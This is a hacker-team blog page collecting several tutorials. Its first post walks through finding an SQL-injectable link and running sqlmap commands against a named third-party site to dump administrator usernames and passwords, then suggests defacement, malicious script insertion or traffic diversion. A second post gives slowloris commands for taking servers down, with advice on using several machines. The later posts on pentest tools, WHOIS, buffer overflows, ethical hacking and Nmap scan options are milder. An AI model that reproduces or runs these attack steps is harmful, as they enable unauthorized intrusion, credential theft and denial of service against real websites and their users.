Today : | at : | Safemode : ON
> Det_Not Hacker | White Hat Aliance | Angkasa Hacker Team | Indonesia | Satu Gertakan Untuk Pertahankan Bumi Pertiwi | Safework of Angkasa Pura database, server MIL.ID | Thanks for all support : BD Green Hat, Nation blood, ID Codding, Jakarta Style cracking, Newbie's HACKER, US ortodox specialist | Learn your skill here with our style.
Title Author Perms Comt Modified Category
Showing posts with label hack. Show all posts
Showing posts with label hack. Show all posts

Hacking Website with sqlmap on Backtrack Unknown rwxr-xr-x 0 17:01

Title Hacking Website with sqlmap on Backtrack
Permission rw-r--r--
Author Unknown
Date and Time 17:01
Category
Share

Hacking website by sqlmap and backtrack.

This style by : http://realhackerspoint.blogspot.in

real hackers point
In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database, defacing it, address forwarding and much more.This is the most powerful attack against any website and can create a word-wide mess if done for evil purposes.
So What are we waiting for ? Lets Begin ...

What Do We Need For This Attack ?

# Backtrack 5 (Would work On Windows Too,Just find a sql injecting software)
# SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)
# Internet Access
# Brains And Balls.
# Lots Of Time.

Step-1 : Finding A Vulnerable Link.

This Is the MOST difficult step in this step, because there are thousands of links in a website and only some of them are capable of SQL Injection, So How to do it ?
The trick for this is to dig in the website and look for anything that might have access to an outside server, 
We will use a scanner provided ny backtrack called "UniScan" which is good at finding vulnerable links.To Open It,Type This In your console (backtrack terminal) :

cd /pentest/web/uniscan && ./uniscan.pl
Follow the onscreen commands and run this tool to find the bug links,sure you can use other scanners.
Once you have found a link, check the link by adding (‘) ignore the brackets please, at the end of the link,
With an id or almost anything behind the php? and behind the = can be tested.
This is because we know it selected something from the database and this might be an entry point.
For Example :
Original "vulnerable" Link : http://www.waterufo.net/item.php?id=200
After adding the symbol : http://www.waterufo.net/item.php?id=200'
If a MySQL error occurs? Then it most likely is vulnerable to SQL Injection.
Example of a MySQL error:
You have an error in your SQL syntax; 
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''
YAYY !

Step 2 : Starting and Setting Up SQLMap :

The SQLMap is the best sql injecting tool ever made, It is good for both beginners and experts, To start it, Type the below command in console :
cd /pentest/web/scanners/sqlmap
Once it has Started, Change this command to your requirements and press enter :
 ./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs

This command will scan the full website by the help of your vulnerable link you inserted.
Now let the scan continue and wait for something like this :

real hackers point


If this appears, you have made you path inside that website, now press N to stop the scan cause we have already found and exploited the vulnerability.

Step 3 : Finding The Columns And Tables ( The Guess Game ) -



As we all know, the data on a website is stored in databases,inside that databases, there are tables and columns, and inside them are the required data.
Suppose my database is waterufo.net,and you have to change it as per your requirements, i'm just supposing so you can understand.We will now type this command to get the tables :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net





You will get something like this :


real hackers point





Now run this command to grab the columns :


/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net 

it will display the columns in the table "fl_users",Something Like This :


real hackers point



Step 4 : Retrieving Usernames And Passwords -


To retrieve the column values, type --dump at the end of the previous query
For Example :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump

You will be presented with the values stored in that columns, In my case, that was the list of Administrator Usernames And Passwords :

By Hackforums





So now you have the administrator usernames and passwords, you can do a lot of things with it for example :


-> Shutdown The Website


-> Insert A Malicious Script In the website,


-> Divert their traffic to other place.


-> Write those Passwords on a brick and hit your Neighbors Kid.



Any of the above will do a lot of damage.

How to DDos attack to server on Backtrack Unknown rwxr-xr-x 0 16:51

Title How to DDos attack to server on Backtrack
Permission rw-r--r--
Author Unknown
Date and Time 16:51
Category
Share
              This is a very quick and simple tutorial on performing a denial of service attack using the custom linux kernal Backtrack 5. If you do not have Backtrack for instructions. The first thing you will need is a file called slowloris.pl. This file can be downloaded into Backtrack from:  

HERE

Copy all the text and paste it into a Gedit document, save it as slowloris.pl to your desktop. Now you must find the IP of the server, you can do this many ways, search google for dns lookup, etc..

After that in terminal type:


Code:
cd Desktop/
Code:
./slowloris.pl -dns (ip of the server)
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4CTuiqHQzD6Oqv2YiJkgncUCOhuQjquuNEEo3GY0dwiDwuWuQDS_EORVqQi-XiqaMU8-6SyVvY7J-qY4-jHjcjyuQmgzTgc0OB_bo1p9cm0kwlMDK3lkpFIu8-nELEiuhuADZTi5ZEDN/s1600/vlcsnap-2012-03-08-23h19m18s112.png

Now this may take a while, but this will take down many servers, you can also open other terminals and do the same thing to speed up the proccess.


SOME SERVERS ALSO HAVE A LOAD BALANCER, THIS WILL CAUSE THE DDOS NOT TO WORK !

For DDos attack do this with several computer 5-6 & u can take big websites down :)!!
 

Best Penetration Testing Tools Unknown rwxr-xr-x 0 22:20

Title Best Penetration Testing Tools
Permission rw-r--r--
Author Unknown
Date and Time 22:20
Category
Share
There are many penetration testing tools on the market. They have been selected to cover a range of testing techniques from web based testing to network mapping, but the best penetration testing  tools are not complete because there are different tools to use for specific tests.



Acunetix
Acunetix are web vulnerability scanner is. It can  a variety of different types of web vulnerabilities, such as SQL Injection and XSS exploits. With built in crawlers, http editors and fuzzers, it providers a large set of useful diagnostic tools to help validate and verify flaws. Today it is one of the best website penetration testing tools.

Metasploit
Metasploit Framework is a key penetration testing tool when it comes to exploit development, host vulnerability validation and exploit execution. It is an opensource project that was created by HD Moore in 2003. It comes with over 800 exploits for Windows, Linux and Mac Operating Systems, with a very simple to use modular system for loading the desired payload. Metasploit also provides the option of encoding the payload in a variety of different formats to help bypass intrusion detection systems, prior to execution. This is a very powerful  and one of the most popular penetration testing tool for exploit development and testing with huge community backing.

Nmap
Nmap is one of the most common tools in a penetration testers arsenal. The tool allows fast host discovery, port mapping, service/operating system identification and enumeration to assist in gathering as much potential basic information about the network and alive hosts. It was developed by Fyodor and was originally an open source project for use on Linux/BSD. Now, It is developed to work on platforms such as Windows and Mac. A relatively new GUI version of Nmap, ‘Zenmap’  was released to work in Windows along side the CLI version.

Wireshark
Wireshark is an opensource packet analyser (network sniffer), which will capture and dump network activity sniffed on active wireless or wired LAN cards. You can capture data and save it as a pcap file watch the network traffic in real-time.  It is able to capture through USB showing what a great tool it is when it comes to analysis of data traffic. It is very useful when trying to monitor network resources, worm activity or general network abuse. Now, the penetration testing tool is available on Windows, Mac and Linux platforms.

Cain and Abel
Cain and Abel is a Windows based password recovery / cracking tool. Cain for short – the software is one of the most versatile password recovery tools available, currently supporting Windows password hash recovery, wireless passwords, MSSQL Passwords, Kerberos, Cisco, VNC, Radius and many more. It has been developed to crack passwords using brute force dictionary attacks, cryptanalysis and rainbow tables.

So, you can choose the best penetration testing  tools for your better and faster work now. Have a nice try.

Information Gathering Using Domain Name Unknown rwxr-xr-x 0 22:18

Title Information Gathering Using Domain Name
Permission rw-r--r--
Author Unknown
Date and Time 22:18
Category
Share
Hacker can gather lots of information just by identifying a domain name of the website. Yes you are right, Information Gathering Using Domain Name. Domain name is a system where we provide a hostname which is automatically converted into the real IP address, so people don’t need remember the IP address, just the domain name or DNS address. When gathering information from a domain name, the first thing need to do is WHOIS. A domain name stores the information about the registered user of domain name itself, IP address, IP address range, and etc. Not only that, with WHOIS we can get the information about domain’s registrant, his contacts, his address, when the domain will expire, etc.

WHOIS can only reveal basic information, not all of the available information of domain name. Ok lets try using WHOIS to gathering a domain information. Open your Terminal and run the WHOIS program or you can search and use free service of WHOIS in the internet.

whois google.com

Now you get domain name information. There are domain name, registered through, registrant, and domain servers. Usually, WHOIS will return the following information about a domain:

  • Inetnum
    The IP range the address.
  • Route
    The address prefix to be routed.
  • Descr
    A short description of related to the domain.
  • Origin
  • Mnt-by
  • Changed
    The Information about who last updated the database object of domain name.
  • Source
    The database place / source of the registered domain name.
Information Gathering Using Domain Name

And some optional attributes are:
  • Country
    The country of the domain registrant. Two letter code of the country.
  • Holes
    The Lists about address prefixes that are not reachable through the route.
  • Member of
  • Inject
    Specifies which routers perform the aggregation.
  • Aggr-mtd
  • Aggr-bndry
  • Export-comps
  • Components
    The component routes used to form the aggregate.
  • Remarks
  • Notify
    The email address where the notification of updated information will be send. 
  • Mnt-lower
  • Mnt-routes
Remember, not all of the domain name stores its registrant data. Some of domain are private. So Information Gathering Using Domain Name is easy, right?

Prevent Buffer Overflow Attack Unknown rwxr-xr-x 0 22:04

Title Prevent Buffer Overflow Attack
Permission rw-r--r--
Author Unknown
Date and Time 22:04
Category
Share
The buffer overflow situation exists if a software makes an attempt to place much more data inside a buffer than it could keep or even when a software attempts to place data in a memory space area past a buffer. Prevent Buffer Overflow Attack is a serious job. Buffer overflows could be activated by inputs that are designed to perform program code, or maybe modify how a software works. This might cause erratic software behavior, such as memory space access errors, wrong final results, a crash, or perhaps a break of system secureness. That's why we must prevent Buffer Overflow Attack from the Hacker.

Therefore, they may be the foundation of several application vulnerabilities and will become maliciously exploited. Buffer overflow has become the most common kind of application security vulnerability. Almost all application developers understand what a buffer overflow vulnerability is actually, however buffer overflow attacks towards the two legacy and also newly-developed programs remain very typical.

This is a illustration from http://bufferoverflowattack.com about Buffer Overflow.

Prevent Buffer Overflow Attack


How to Prevent Buffer Overflow Attack

Buffer overflows aren't simple to find and also while one is found, it's mostly very complicated to exploit. Prevent Buffer Overflow Attack is difficult. Nevertheless, attackers have managed to recognize buffer overflows inside a staggering array of products and also components. Stay informed about the most up-to-date bug information for your web and also software server products and also other products in the Internet system. Use the most recent patches in order to the products.

To prevent Buffer Overflow Attack, regularly check out your own website using more than one of your generally available scanners which try to find buffer overflow defects inside your server products plus your customized web applications.

How to Become Ethical Hacker Unknown rwxr-xr-x 0 21:49

Title How to Become Ethical Hacker
Permission rw-r--r--
Author Unknown
Date and Time 21:49
Category
Share
What is an ethical hacker? Who are the ethical hackers? Ethical hackers is a white hat hackers, legal hacker, or you can called them penetration tester. They protect systems from dangerous intrusions. Ethical hacker are expert in computer security. Ethical hackers are technically skilled IT that has been pass an IT certification or computer security certification. One of the certification and training of ethical hacker is CEH. What is CEH? The Certified Ethical Hacker is a professional certification provided by the International Council of E-Commerce Consultants (EC-Council.). It provide online training and certification of ethical hacker. Now I'll explain you how to become an ethical hackerhow to ethical hacking, and how to become it certified.



How to Become Ethical Hacker


To be a professional ethical hacker you require motivation, dedication, initiative, self-education and formal training in ethical hacking.

1. Be a white hat hacker
This is most important part of become an ethical hacker. You must be a white hacker. If you be white hacker you will be legal hacker or the other cool name, penetration tester.

2. Learn the network system
THIS IS THE BASIC SKILL! You must learn it and expert on it

3. Learn the UNIX operating system
THIS IS ALSO BASIC SKILL! You must expert and know how to use UNIX operating system. Not only UNIX, you must learn Windows and Mac OS so you can know how that OS work and you can find the vulnerability.

4. Stay tune on computer security news
Stay up to date to the IT securrity news. With this you can know about new hacking technique, exploit, etc

5. Stay connected to the hacker community
You can get free support if you get some difficulty from your community

6. Take a professional course
Yes of course, you must take some security professional course, training, or sertification. One of them is Certified Ethical Hacker (CEH). CEH has obtained a certification in how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a hacker. Qualification for a CEH involves mastering penetration testing, footprinting and reconnaissance, and social engineering. You will learn creating Trojan horses, backdoors, viruses, and worms. Also denial of service (DoS) attacks, SQL injection, buffer overflow, session hijacking, and system hacking.


That's all about what is an ethical hacker? who are the ethical hackers? how to become an ethical hackerhow to ethical hacking, and how to become it certified. Hope you like it

Nmap Basic Tutorial Unknown rwxr-xr-x 0 20:52

Title Nmap Basic Tutorial
Permission rw-r--r--
Author Unknown
Date and Time 20:52
Category
Share
Backtrack has its Nmap installed inside. Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Nmap is Flexible, Powerful, Portable, Easy, Free, Well, Supported, Acclaimed, and Popular.

Nmap has some basic options:
-sT : TCP Connect, using method connect(), we can determine wheter the port opened or not, but it is easily to detect by firewall/intrusion detection software.
-sS : SYN stealth scan, using syn to begin connection then sending rst to stop initiation connection, so that no connection will be made. it results in harder detection.
-sF, -sN, -sX : FIN, NULL, Xmass Tree Scan. FIN will send Fin Flag, Null will set no flag and Xmass Tree sets the FIN, URG and PUSH flags. It is used to avoid system detection.
-sP : Ping Scan , scan with ping command to determine whether the target online or not
-sU : UDP Scan , scan port with UDP packet.
-sO : IP Protocol Scan, scan port using ip raw packet.
-sI : Idle Scanning, more advanced scanning mode
-sV : Version Detection,
-sA : ACK Scan,
-sW, -sR, -sL : Window Scan, RPC Scan, List Scan
Powered by Blogger.